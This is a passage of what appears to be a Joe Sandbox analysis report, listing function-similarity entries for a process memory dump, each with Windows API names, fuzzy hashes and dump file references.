                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 3659116390-0
                                                                                                          • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                                                          • Instruction ID: dcd32c4a796b3d8c6197d400610b669ca0b62aac0f359ec3aa16958189d40cce
                                                                                                          • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                                                          • Instruction Fuzzy Hash: E251BF32E14A5189E714CB29E4A43EC7BB1FB49B98F048176CF4E8769ADF38D946C700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                          • String ID:
                                                                                                          • API String ID: 3740051246-0
                                                                                                          • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                                          • Instruction ID: ddc3ceeffd65e4c3c6baf93fac03c5d902ba57ccbaf7b812b4383231f809a925
                                                                                                          • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                                          • Instruction Fuzzy Hash: E3618132A08A8685EB10DB69D4643FD7B60FB86B84F404131EB4D87AABCF7CD945CB54
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                                          • String ID:
                                                                                                          • API String ID: 4136290138-0
                                                                                                          • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                                          • Instruction ID: 19ee33f5bcaa102aac1d3a07aefad70f9b17e0abdc2a78f9ac0bdf197a385cff
                                                                                                          • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                                          • Instruction Fuzzy Hash: 19516533624A8592DB10CF19D4A47AD33B4FB94F84F428126CB8D83769EF39E859C701
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                          • String ID:
                                                                                                          • API String ID: 2832842796-0
                                                                                                          • Opcode ID: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                                                                          • Instruction ID: c14a54b5dd196bd0a483bc9cc332a13cc45c6f87cae910cbdf47ad4ae65f9d65
                                                                                                          • Opcode Fuzzy Hash: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                                                                          • Instruction Fuzzy Hash: 0E512D26A18A4682EB14DF1AD4A05AD7760FB89FD4F448032EF8E8776ACF3DD844C710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 4210589936-0
                                                                                                          • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                                          • Instruction ID: aa14c8724b122b51b4ed974bca5600c02657359fe9581e46e9e3638b27a2fea7
                                                                                                          • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                                          • Instruction Fuzzy Hash: 9351C332B09681CBE754CF39D5605E97760FB46B94F100231EB5A83BDACF38E8518B10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 190572456-0
                                                                                                          • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                                          • Instruction ID: 63d84031a38b91df518d1fc35e12e9b5246e38626450fcca63028ed162eace89
                                                                                                          • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                                          • Instruction Fuzzy Hash: 45418261B09A4681FA199F1AA8346F56391FF49F90F198535DF1ECB69EDF7CE8008300
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Show$Enable
                                                                                                          • String ID:
                                                                                                          • API String ID: 2939132127-0
                                                                                                          • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                          • Instruction ID: 2d30e5ca37582b343f9b363eb7900c025ebadb76ff22e2842f8ff388b5d2bea9
                                                                                                          • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                          • Instruction Fuzzy Hash: B451633694968E85EB52CB1DD4646B83761EB86F84F184036CB4D973EAEF3DE841C310
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3382505437-0
                                                                                                          • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                                          • Instruction ID: ed4854976088dd4bd29f791880dd7ecae4fed78b0e847f650dc2618987d6fc0e
                                                                                                          • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                                          • Instruction Fuzzy Hash: 9C31D4366086068AE710CB1DE4545A97391E789FA8F500232EF6EC779ACE3CEC458700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                          • String ID:
                                                                                                          • API String ID: 2256411358-0
                                                                                                          • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                                          • Instruction ID: 028b1dbf5d5a7e81b448c49db14762168ad29709fbbae0a865ac882b04e217b3
                                                                                                          • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                                          • Instruction Fuzzy Hash: 13412C23D0D69686FBA18B2C94697F926A1AF46F44F581039D74EC61EFCF2DEC858700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                                                          • String ID:
                                                                                                          • API String ID: 2655805287-0
                                                                                                          • Opcode ID: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                                                                          • Instruction ID: 9729f4b9dc036c8857ffd5e672ad184b9a74db6bec99506d0113b7744cfb2a79
                                                                                                          • Opcode Fuzzy Hash: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                                                                          • Instruction Fuzzy Hash: A921F722B0978246EB14DB1AA9256B566A0FF8AFE0F444530EF1DC77DBDE3CE8508340
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                          • String ID:
                                                                                                          • API String ID: 3225163088-0
                                                                                                          • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                                                          • Instruction ID: 7bf63f7121e543d6027afcb825ab29e3ebc073121253ad59a420d4bb7134dcdd
                                                                                                          • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                                                          • Instruction Fuzzy Hash: 3931903291875287E3808B0AA8553A9BAA2FB45F80F504139DB89D679ACF7DEC418B04
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 4156661090-0
                                                                                                          • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                                                          • Instruction ID: 12941600e1d47233bd60295d7fc64a1237a775730b9e4a104c1b1cd018c63dab
                                                                                                          • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                                                          • Instruction Fuzzy Hash: 3B217422B0964582E704EF2AD4A44BDA3A0FB8AF90B084035DF4DC779ADF79D8428740
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2067211477-0
                                                                                                          • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                                                          • Instruction ID: deb762f3727dbca3e4b7ead4e93a910287a72ce68653a19a582b3b7d49dbe87e
                                                                                                          • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                                                          • Instruction Fuzzy Hash: A3214125A09B8285EE59DB69F4705F9A290AF86F80F084530EB4E8779EDF2CEC008610
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _set_statfp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1156100317-0
                                                                                                          • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                                          • Instruction ID: a4066318a4f271aa457e87ea0034f3badea234ae0dfce82ae78e46e45bf59ea3
                                                                                                          • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                                          • Instruction Fuzzy Hash: 1111BFA6E2968345FA5C212CF4723F591626F47BA0F054230EF6EC66DF8E1CAC408102
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2117695475-0
                                                                                                          • Opcode ID: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                                                          • Instruction ID: 853f03a817905264e26447255755dde7e9703936865b0bf6cb8489daffb3a7e6
                                                                                                          • Opcode Fuzzy Hash: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                                                          • Instruction Fuzzy Hash: 33118D41E09A4746FA3877B8A8766FD12814F57F01F840439EB1DEA2CFED1CBC554622
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 3897988419-0
                                                                                                          • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                                          • Instruction ID: 649f8f439b9410fd784d646228535ac5159eb6a6e1b31f552293ef7bbd028948
                                                                                                          • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                                          • Instruction Fuzzy Hash: 8C11FE25608B4286E7548F2AA4603AA62A4FF86FC5F185035DF4DC765EDF2DD8458701
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3741023627-0
                                                                                                          • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                                                          • Instruction ID: 5ba1fdd9d0f1873c7c2dfaca54c6ee874e93acd015856f66cb9df7aa3bc355d9
                                                                                                          • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                                                          • Instruction Fuzzy Hash: CD116522A0894681EB659F28E4647B96360FF85F44F444031DB4D862DEDF7CDD89C700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                          • String ID:
                                                                                                          • API String ID: 2833360925-0
                                                                                                          • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                                          • Instruction ID: 77c5d85a519a7e7625a8c27a8aa4b770e597f3eeaf4b9fc703c4cf3ef8abf1fa
                                                                                                          • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                                          • Instruction Fuzzy Hash: A801B120A18A0246FB058B3AA4F44B99360AFA7F90B540235E30FD25EBDF2DECC48600
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00007FF6B5B829AD,?,?,?,00007FF6B5B32AB2), ref: 00007FF6B5BA003C
                                                                                                          • TerminateThread.KERNEL32(?,?,?,00007FF6B5B829AD,?,?,?,00007FF6B5B32AB2), ref: 00007FF6B5BA0047
